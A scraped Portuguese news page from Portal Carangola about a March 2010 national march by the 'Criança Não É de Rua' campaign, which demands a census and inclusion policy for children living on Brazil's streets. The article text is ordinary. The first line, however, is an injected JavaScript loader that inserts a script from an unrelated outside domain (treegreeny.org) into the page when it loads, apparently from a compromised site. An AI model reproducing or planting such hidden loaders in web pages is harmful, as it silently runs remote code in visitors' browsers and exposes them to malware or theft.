;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Campanha Nacional realizará protestos nas capitais. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Campanha Nacional realizará protestos nas capitais.

A ação reivindica a realização de um levantamento nacional sobre as crianças e adolescentes em “situação de moradia na rua” e uma política específica de inclusão social destas e de suas famílias.

Na próxima terça-feira, 30 de março, acontecerão mobilizações simultâneas em mais de 10 capitais em defesa das crianças e adolescentes que vivem em situação de moradia nas ruas.

Centenas de crianças e adolescentes (muitos dos quais ex-moradores de rua) serão os atores desta mobilização. Eles são atendidos por diversas instituições parceiras da Campanha Nacional Criança não é de Rua que decidiram tomar uma atitude e demonstrar que não aceitam mais conviver com mais este escândalo nacional.

A encenação consiste numa caminhada na qual os protagonistas conduzirão cruzes de madeira, simbolizando o sofrimento diário das crianças que moram nas ruas. Cada pequeno ator representa um menino ou menina que ainda hoje dormirá nas ruas e praças das grandes cidades do Brasil. O alerta do Comitê Nacional Criança Não é de Rua é de que sem políticas públicas integradas e direcionadas às famílias e comunidades não é possível solucionar de modo eficaz a problemática. A estimativa da ONU é de que 5 milhões de crianças vivam nestas condições, submetidas a inúmeras violações de direitos, no Brasil.

A ação reivindica ao Estado Brasileiro a realização de um levantamento nacional das crianças e adolescentes que vivem em “situação de moradia na rua”, dado imprescindível para a elaboração de uma política nacional para inclusão social destes seres humanos. Significa ainda um gesto concreto de solidariedade e será realizado em Aracaju, Carangola, Cuiabá, Curitiba, Fortaleza, Maceió, Manaus, Palmas, Recife, Rio de Janeiro, São Luis, Teresina, Salvador e Belém.

A ação faz parte da Campanha Nacional Criança Não É de Rua – uma mobilização Nacional em Defesa dos Direitos de Crianças e Adolescentes em Situação de Moradia nas Ruas. O movimento surgiu em 2005 e realizou seminários e pesquisas em todas as capitais visando sensibilizar a sociedade e o poder público para as violações de direitos sofridas pelas crianças e adolescentes que vivem nas ruas e por suas famílias.

Serviço

Ação Nacional de Sensibilização Criança Não é de Rua
Quando: terça-feira, 30 de março de 2010

Cidades: Aracaju, Carangola, Cuiabá, Curitiba, Fortaleza, Maceió, Manaus, Palmas, Recife, Rio de Janeiro, São Luis, Teresina, Salvador e Belém.

Visite o Site: www.criancanaoederua.org.br

Mais informações: Comitê Nacional Criança Não É de Rua

Adriano Ribeiro
Coordenador da Campanha Nacional Criança Não É de Rua
(085) 3212-9477 ou 8829-1122
Email: adriano@criancanaoederua.org.br ou faleconosco@criancanoaederua.org.br

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.